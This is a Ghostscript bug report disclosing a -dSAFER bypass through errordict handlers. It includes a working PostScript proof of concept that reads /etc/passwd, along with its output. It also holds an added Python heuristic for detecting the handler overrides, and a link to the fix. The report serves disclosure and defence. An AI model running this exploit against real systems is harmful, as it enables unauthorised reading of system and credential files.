Bug 699658 - Bypassing PermitFileReading by handling undefinedfilename errors
Status: NOTIFIED FIXED
Alias: None
Product: Ghostscript
Classification: Unclassified
Component: General
Version: unspecified
Hardware: PC Linux
Importance: P2 major
Assignee: Chris Liddell (chrisl)
QA Contact: gs-security
Duplicates: 699662
Reported: 2018-08-21 18:03 UTC by Tavis Ormandy
Modified: 2018-12-18 11:37 UTC
Customer: 501,641
Description Tavis Ormandy 2018-08-21 18:03:14 UTC
If you handle /undefinedfilename, you can provide a filename to pseudo operators that is outside of PermitFileReading. Getting the contents is tricky, but here is a demo:

$ cat fileread.ps
/FileToSteal (/etc/passwd) def
errordict /undefinedfilename {
    FileToSteal % save the undefined name
} put
errordict /undefined {
    (STOLEN: ) print
    counttomark {
        ==only
    } repeat
    (\n) print
    FileToSteal
} put
errordict /invalidfileaccess {
    pop
} put
errordict /typecheck {
    pop
} put
FileToSteal (w) .tempfile
statusdict
begin
    1 1 .setpagesize
end
quit
$ gs -q -sDEVICE=ppmraw -dSAFER  fileread.ps
GPL Ghostscript 9.23:
STOLEN: root:x:0:0:root:
STOLEN: daemon:x:1:1:daemon:/bash/bin/root:(/etc/passwd)
STOLEN: bin:x:2:2:bin:/nologin/sbin/usr/sbin:/usr(/etc/passwd)
STOLEN: sys:x:3:3:sys:/nologin/sbin/usr/bin:(/etc/passwd)
STOLEN: sync:x:4:65534:sync:/nologin/sbin/usr/dev:(/etc/passwd)
STOLEN: games:x:5:60:games:/sync/bin/bin:(/etc/passwd)
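
A defender-side triage check for the pattern in the demo above, as an added example that is not part of the original report or of Ghostscript: it flags PostScript input that replaces the errordict handlers the demo replaces, ignoring text inside strings and comments. The function names, the WATCHED set and the sample are constructed for illustration.

```python
import re

# Error names whose errordict handlers the demo in this report replaces.
WATCHED = {"undefinedfilename", "undefined", "invalidfileaccess", "typecheck"}

# `errordict` as a whole token, followed by a literal name such as /undefined.
HANDLER = re.compile(r"(?<![^\s\[\]{}<>/])errordict\s+/([^\s\[\]{}<>/()%]+)")

def strip_comments_and_strings(ps):
    """Blank out (...) strings and % comments, keeping newlines."""
    out, depth, i, n = [], 0, 0, len(ps)
    while i < n:
        c = ps[i]
        if depth:                          # inside a (...) string literal
            if c == "\\":                  # escape: consume the next char too
                i += 1
                c = ps[i] if i < n else " "
            elif c == "(":                 # balanced parens nest in strings
                depth += 1
            elif c == ")":
                depth -= 1
            out.append("\n" if c == "\n" else " ")
        elif c == "(":
            depth = 1
            out.append(" ")
        elif c == "%":                     # comment runs to end of line
            while i < n and ps[i] != "\n":
                i += 1
            continue
        else:
            out.append(c)
        i += 1
    return "".join(out)

def find_handler_overrides(ps):
    """Return [(line, error_name)] for watched `errordict /name` pairs."""
    clean = strip_comments_and_strings(ps)
    return [(clean.count("\n", 0, m.start()) + 1, m.group(1))
            for m in HANDLER.finditer(clean) if m.group(1) in WATCHED]

# Constructed sample, not taken from the report.
SAMPLE = r"""%!PS
% errordict /typecheck {pop} put   (comment: must be ignored)
(errordict /undefined inside a string \) still inside) print
errordict /undefinedfilename { pop } put
errordict /invalidfileaccess { pop } put
errordict /handleerror { } put
"""
```

This is a static heuristic that PostScript can evade by building names at run time; it can prioritise files for review but does not replace running a Ghostscript build that contains the fix.
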
Comment 1 Chris Liddell (chrisl) 2018-08-23 09:28:27 UTC
*** Bug 699662 has been marked as a duplicate of this bug. ***
Comment 2 Chris Liddell (chrisl) 2018-08-23 11:43:39 UTC
Fixed in:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42